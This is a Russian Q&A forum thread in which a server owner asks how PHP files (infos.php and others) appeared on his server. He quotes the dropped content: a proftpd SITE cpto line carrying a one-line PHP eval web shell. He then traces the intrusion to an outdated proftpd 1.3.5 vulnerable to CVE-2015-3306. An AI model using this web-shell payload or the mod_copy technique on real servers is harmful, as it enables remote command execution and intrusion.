Задать вопрос
PavelK
@PavelK
ubuntu

Взломали, файлы infos.php, infs.php, infosof.php, как и откуда?

Приветствую!
На сервер сегодня в открытые папки для записи упали файлы с содержимым:
proftpd: 93.83.111.21:51918: SITE cpto /tmp/.<?php eval($_REQUEST[cmd]); echo GOOD;?>

Благо серв был настроен и ничего страшного не произошло, но вопрос - как и откуда??
P.S. proftpd версии 1.3.6 (все пакеты актуальные всегда)
  • Вопрос задан
  • 937 просмотров
Комментировать
Подписаться 3 Оценить Комментировать
Решения вопроса 1
PavelK
@PavelK Автор вопроса
В общем косяк был мой. Давно, когда вышла уязвимость CVE-2015-3306, обновил я proftpd из исходников, поленившись собрать deb пакет. При перезагрузке сервера загрузилась не обновлённая версия, а старая =(
в итоге, я думал, что у меня 1.3.6, а работала на самом деле 1.3.5.
Ответ написан
4 комментария
4 комментария
Пригласить эксперта
Ответы на вопрос 2
Frankenstine
@Frankenstine
Сисадмин
Забрутили/проснифали пароль? Курите логи аутентификации :)
Ответ написан
1 комментарий
1 комментарий
Dit81
@Dit81
Security researcher, pentester, internet-marketer
Трояны, вирусы, слабые угадываемые пароли... Путей масса. Возможно совпадение паролей для различных сервисов и сайтов...
Ответ написан
2 комментария
2 комментария
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы
Вакансии с Хабр Карьеры
Fullstack-разработчик (PHP / VueJS)
Bash Today
от 200 000 до 230 000 ₽
С/С++ Linux разработчик
Tempesta Technologies
До 8 000 $
Специалист технической поддержки (IT-компания)
Immers.cloud
от 60 000 до 60 000 ₽
Ещё вакансии
Заказы с Хабр Фриланса
Разработать бэкэнд на Node.js
25 нояб. 2024, в 18:39
30000 руб./за проект
Разработать бэкэнд на Django
25 нояб. 2024, в 18:35
30000 руб./за проект
Перенести сайт на CMS Wordpress c Tilda
25 нояб. 2024, в 18:33
10000 руб./за проект
Ещё заказы